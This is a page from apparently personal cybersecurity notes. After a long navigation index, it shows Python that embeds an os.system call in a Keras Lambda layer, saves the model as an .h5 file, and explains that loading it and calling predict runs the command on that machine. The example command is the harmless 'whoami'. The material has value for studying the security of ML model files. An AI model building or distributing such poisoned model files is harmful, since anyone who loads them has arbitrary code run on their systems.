Cyber Security Notes

Creating Malicious Tensorflow Models

Cyber Security Notes

Index
Attacking Web Applications
Attacking Web Applications
Binary Exploitation
Binary Exploitation
- How to use GDB
Cryptography
Cryptography
- Pretty Good Privacy (PGP)
- Asymmetric Encryption
  Asymmetric Encryption
  - RSA
    RSA
    
    RSA Attacks
    
    RSA Basics
- Symetric Encryption
  Symetric Encryption
  - AES
    AES
    
    AES Basics
General Pentesting
General Pentesting
- Data Exfiltration
- Miscellaneous Tools
- Miscellaneous Services
- Pivoting
- Port Scanning
- Password Attacks
  Password Attacks
  - Offline Password Attacks
  - Online Password Attacks
Miscellaneous
Miscellaneous
- Machine Learning & AI Attacks
  Machine Learning & AI Attacks
  - Creating Malicious Tensorflow Models
Pentesting Linux
Pentesting Linux
- Priviliage Escalation
- Linux - Stabilisation & Post Exploitation
Pentesting Windows
Pentesting Windows
- Creating Robust Reverse Shells
- Enumerating Windows
- Network Enumeration
- Windows - Stabilisation & Post Exploitation
- Windows Commands
- Windows Local Persistence
- Windows Privilage Escalation
- Windows Tools
- Active Directory
  Active Directory
  - Enumerating Users
  - Hashes & Tokens
    Hashes & Tokens
    
    ASREPRoasting
    
    Dumping Hashes
  - Post Exploitation
    Post Exploitation
    
    Enumaration of Active Directory
  - Remote Management
    Remote Management
    
    evil-winrm
- Windows Services
  Windows Services
  - Pentesting MS-SQL
  - SMB Protocol
Reverse Engineering & Forensics
Reverse Engineering & Forensics
- Memory Analysis
  Memory Analysis
- Reversing Python
  Reversing Python
  - Decompile .elf & .exe Binaries.md

Creating Malicious Tensorflow Models¶

Tensorflow models can be created with malicious code embedded in them.

import tensorflow as tf

def exploit(x):
    import os
    cmd = "whoami"
    os.system(cmd)
    return x

model = tf.keras.Sequential()
model.add(tf.keras.layers.Input(shape=(64,)))
model.add(tf.keras.layers.Lambda(exploit))
model.compile()
model.save("exploit.h5")

If someone loads this model and runs it as follows:

import tensorflow as tf

model = tf.keras.models.load_model("exploit.h5")
model.predict(tf.zeros((1, 64)))

The whoami command will be executed on the system. This is a simple example, but the possibilities are endless.